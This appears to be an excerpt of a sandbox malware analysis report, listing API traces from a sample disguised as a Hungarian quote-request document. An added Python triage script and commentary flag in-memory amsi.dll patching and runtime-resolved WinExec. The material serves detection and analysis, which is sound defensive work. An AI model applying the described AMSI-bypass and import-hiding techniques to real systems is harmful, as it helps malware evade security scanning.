• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                                  • Opcode ID: 8c126fdf86f860fb98aa95d4612a2b9bfb42779a9a74d20f63adf344b114319e
                                                                                                                                                  • Instruction ID: 2e1ec77a523fd8a1940a189f4a82efeb20b12aeee59e5417e068bbefb375de7d
                                                                                                                                                  • Opcode Fuzzy Hash: 8c126fdf86f860fb98aa95d4612a2b9bfb42779a9a74d20f63adf344b114319e
                                                                                                                                                  • Instruction Fuzzy Hash: D4410035B1024C9FEB12EBA8D951ADEB3FAFFC8700F605435E041A7291DAB4AD118F95
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                  • Opcode ID: 751f08323a179d5e2a381d0ff18f001477dd6f9b7e0c39f647a43c88d76f08d9
                                                                                                                                                  • Instruction ID: fb5a4620855050e3d580b77383d51af325bea5d30d7ff097c77373856c8eaefd
                                                                                                                                                  • Opcode Fuzzy Hash: 751f08323a179d5e2a381d0ff18f001477dd6f9b7e0c39f647a43c88d76f08d9
                                                                                                                                                  • Instruction Fuzzy Hash: 7A016D74684304EFEB11EBB8DE61BAAB7EDFB88B00F514460F900D6640DA70AE118A64
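Three of the function records above are worth reading together: the routine that calls LoadLibraryW("amsi") and then reaches NtWriteVirtualMemory, the InternetCheckConnectionA routine whose string table carries Initialize, OpenSession and ScanBuffer (the names of amsi.dll exports with the "Amsi" prefix removed), and the routine that resolves WinExec through GetModuleHandle/GetProcAddress instead of importing it. That combination is consistent with patching amsi.dll in memory and with hiding the process-launch API from the static import table. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API-trace lines written in the same shape as the "APIs" fields above and applies two triage rules over them. The trace lines and string list are constructed by hand for the example, and the rule names, thresholds and the extra API names in the allow-lists (WriteProcessMemory, CreateProcess*, ShellExecute*) are my own assumptions, not anything the report states.

```python
import re

# Constructed sample input in the shape of the report's "APIs" lines and
# "String ID" field. Hand-written for this example; not parsed from the live page.
SAMPLE_TRACE = """\
LoadLibraryW.KERNEL32(amsi), ref: 029B88C1
Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000), ref: 029B82C1
Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
FreeLibrary.KERNEL32(00000000,00000000,DllGetClassObject), ref: 029B8920
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029BE5F6
WinExec.KERNEL32(?,?), ref: 029B8624
Sleep.KERNEL32(0000000A,00000000,?), ref: 029A1B31
"""
SAMPLE_STRINGS = ["DllGetClassObject", "W", "amsi", "Initialize",
                  "OpenSession", "ScanBuffer", "Kernel32", "WinExec"]

# One API line: <api>.<module>(<args>), ref: <address>
API_LINE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)"
)

# amsi.dll export names without the "Amsi" prefix, which is how the report's
# String ID field shows them (Initialize$OpenSession$ScanBuffer).
AMSI_EXPORT_FRAGMENTS = {"Initialize", "OpenSession", "ScanBuffer", "ScanString", "CloseSession"}
# Assumed allow-lists for the two rules; only NtWriteVirtualMemory and WinExec
# actually appear in the report above.
MEMORY_WRITE_APIS = {"NtWriteVirtualMemory", "ZwWriteVirtualMemory", "WriteProcessMemory"}
EXEC_APIS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"}


def parse_trace(text):
    """Turn report-style API lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"].upper(),
                      "args": args, "ref": m["ref"].upper()})
    return calls


def find_amsi_tamper(calls, strings):
    """LoadLibrary of amsi plus a raw memory write; AMSI export names raise confidence."""
    loads_amsi = [c for c in calls
                  if c["api"].startswith("LoadLibrary")
                  and c["args"] and c["args"][0].lower().startswith("amsi")]
    writes = [c for c in calls if c["api"] in MEMORY_WRITE_APIS]
    if not (loads_amsi and writes):
        return None
    exports = sorted(AMSI_EXPORT_FRAGMENTS & set(strings))
    return {"rule": "amsi-module-tamper",
            "confidence": "high" if exports else "medium",
            "evidence": [c["ref"] for c in loads_amsi + writes],
            "amsi_exports_referenced": exports}


def find_dynamic_exec(calls, strings):
    """A process-launch API whose name is also a plain string: resolved by name at runtime."""
    resolver = any(c["api"] == "GetProcAddress" for c in calls)
    launched = {c["api"] for c in calls if c["api"] in EXEC_APIS}
    by_name = sorted(launched & set(strings))
    if not (resolver and by_name):
        return None
    return {"rule": "dynamically-resolved-exec", "apis": by_name}


def triage(text, strings):
    """Run both rules over one function record and return the findings that fired."""
    calls = parse_trace(text)
    return [f for f in (find_amsi_tamper(calls, strings),
                        find_dynamic_exec(calls, strings)) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_TRACE, SAMPLE_STRINGS):
        print(finding)
```

The parser deliberately accepts the "Part of subcall function" prefix, because the memory write in the record above is reached through a subcall rather than made directly; a rule that only looked at top-level calls would miss it. The ref addresses are carried through so a finding can be tied back to the exact instruction in the dump.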
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                  • Opcode ID: 118ce5eef406e1c20bccc0046a088c73ab420acf7c0e887d295f724322e07f4b
                                                                                                                                                  • Instruction ID: 760448655d459276f16a651761cb31b50a79f5c34fb4950e0d297e05fbecfc75
                                                                                                                                                  • Opcode Fuzzy Hash: 118ce5eef406e1c20bccc0046a088c73ab420acf7c0e887d295f724322e07f4b
                                                                                                                                                  • Instruction Fuzzy Hash: B9F06D74684304EFEB11EBA8DE61B9AB7EDFB88B00F514460F900D6640DA70AE118A64
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5C88
                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5CB6
                                                                                                                                                    • Part of subcall function 029A7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029B3900,029B5CF6,00000000,029B5D74,?,?,029B3900), ref: 029A7DAA
                                                                                                                                                    • Part of subcall function 029A7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029B3900,029B5D11,00000000,029B5D74,?,?,029B3900,00000001), ref: 029A7FB7
                                                                                                                                                  • GetLastError.KERNEL32(00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5D1B
                                                                                                                                                    • Part of subcall function 029AA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029AC3D9,00000000,029AC433), ref: 029AA797
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 503785936-0
                                                                                                                                                  • Opcode ID: c4bb1b0b6f019a6859be5f5bec935dce1c3404f0ace1cf6bab24180af3754db9
                                                                                                                                                  • Instruction ID: 86b250750ea91f79dd3b91948f99fe9e9aa511401bdd58931920cb4dd3da60cc
                                                                                                                                                  • Opcode Fuzzy Hash: c4bb1b0b6f019a6859be5f5bec935dce1c3404f0ace1cf6bab24180af3754db9
                                                                                                                                                  • Instruction Fuzzy Hash: 6B31A070A003089FDB01EFA8C9917EEBBF6AF88700F918168D504AB390D7755E048FA5
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                  • Opcode ID: 55e1cd125640de84e3ccdf8b6b4db3bb9365db596515c624112adc1bf6b9ffc1
                                                                                                                                                  • Instruction ID: 00314fc112730e2a03ad24545db9d0a672059e0e3d571f1c9475a61e2dd7ade2
                                                                                                                                                  • Opcode Fuzzy Hash: 55e1cd125640de84e3ccdf8b6b4db3bb9365db596515c624112adc1bf6b9ffc1
                                                                                                                                                  • Instruction Fuzzy Hash: 31F06D24B09310C7AB25BB398DF46AD379ADF80344B101C36F486AB215DF65CC49CBE2
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 029A4D5B
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 029A4D6D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                  • Instruction ID: 6294bc7210721669daaf5687ad2e23af61b029870c7714ed5dc40e962e5182bb
                                                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                  • Instruction Fuzzy Hash: 07E0ECBC2053056EEB146F219960AB6622EAFC1750F249499A814CA154D778D440ADB8
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 029B73DA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID: H
                                                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                                                  • Opcode ID: 2e7716513ce00d596eb56bdf9056814f112868d272e128604906b80a210347a2
                                                                                                                                                  • Instruction ID: caabf6fe6edce7795e01762ecb2a76349cff24f1c2bb0fa136be7029b7af3cce
                                                                                                                                                  • Opcode Fuzzy Hash: 2e7716513ce00d596eb56bdf9056814f112868d272e128604906b80a210347a2
                                                                                                                                                  • Instruction Fuzzy Hash: 37B1D075A016089FDB16CF98E580AEDFBF6FF89314F258669E805AB360D730A845CF50
                                                                                                                                                  APIs
                                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 029AE781
                                                                                                                                                    • Part of subcall function 029AE364: VariantClear.OLEAUT32(?), ref: 029AE373
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                                  • Opcode ID: b047b37d413f93bfe8d3de241d09eb41bfc2229e6d6e87df045af3473255ab7d
                                                                                                                                                  • Instruction ID: d42d52b32ae65acd1b901829469dc741f996b04f71c7e759c1f2cd06f727c535
                                                                                                                                                  • Opcode Fuzzy Hash: b047b37d413f93bfe8d3de241d09eb41bfc2229e6d6e87df045af3473255ab7d
                                                                                                                                                  • Instruction Fuzzy Hash: A6118E20B0031087CB35AF29C8E4A6677DAAFC5750B019876E9CA9B215DB30CC41CAE2
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                  • Opcode ID: c7d921218623021e656e47650810d7b8730648207d4712b9062f9e0c4acda57b
                                                                                                                                                  • Instruction ID: 5b344d5117bcc8f301d5a758c34b2cb3cb714291dacf8fdb8b7080b916445d4e
                                                                                                                                                  • Opcode Fuzzy Hash: c7d921218623021e656e47650810d7b8730648207d4712b9062f9e0c4acda57b
                                                                                                                                                  • Instruction Fuzzy Hash: 97315E71A04308ABDB10DFA8C8A4AAA7BFDEB4C304F544475F989D3240D734DA50CBE5
APIs
  • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
  • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
  • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
  • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
  • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
  • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
  • Part of subcall function 029B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
• FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
• API String ID: 1478290883-0
• Opcode ID: 4f163c48f64c64be77ad15fd1228e41c239cbd59976c8b08ea78c2d9d55bd866
• Instruction ID: 796ef7d457fe79b50808de67ed8260032858553fbf331f5ba347e05dd6179c12
• Opcode Fuzzy Hash: 4f163c48f64c64be77ad15fd1228e41c239cbd59976c8b08ea78c2d9d55bd866
• Instruction Fuzzy Hash: 0D214574A80300BEEB51FBB8DE16B9DB79DBFC5B00F5014A0F504E7280DA749A118E58
APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,029B6DB9,?,?,?,00000000), ref: 029B6D99
  • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: 856ca387039bef35d7ca32b427a3efb8962bafb0638a72fa9f8f0fcff1ebfcc9
• Instruction ID: 83fd8cbb1354a439959eb8a4328efc253e0f701d2f8f3bdc28172bd2f439d5ef
• Opcode Fuzzy Hash: 856ca387039bef35d7ca32b427a3efb8962bafb0638a72fa9f8f0fcff1ebfcc9
• Instruction Fuzzy Hash: 3CE0E5352043087BE312EB62DD61D8E77EDDFCA700F5104B1E50093540DA717D0088A0
APIs
• GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029A5886
  • Part of subcall function 029A5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029A0000,029CE790), ref: 029A5AE8
  • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B06
  • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B24
  • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029A5B42
  • Part of subcall function 029A5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029A5B8B
  • Part of subcall function 029A5ACC: RegQueryValueExA.ADVAPI32(?,029A5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001), ref: 029A5BA9
  • Part of subcall function 029A5ACC: RegCloseKey.ADVAPI32(?,029A5BD8,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029A5BCB
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: 29944795b6e174aeef18392e87be50a0c47e059fcb2a2432bd522ca6f333b214
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: 57E06D71E003148FCB10DE9CD8D0B4633D8AB48750F450961ED58CF246D7B0D9108BD0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029A7DF4
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
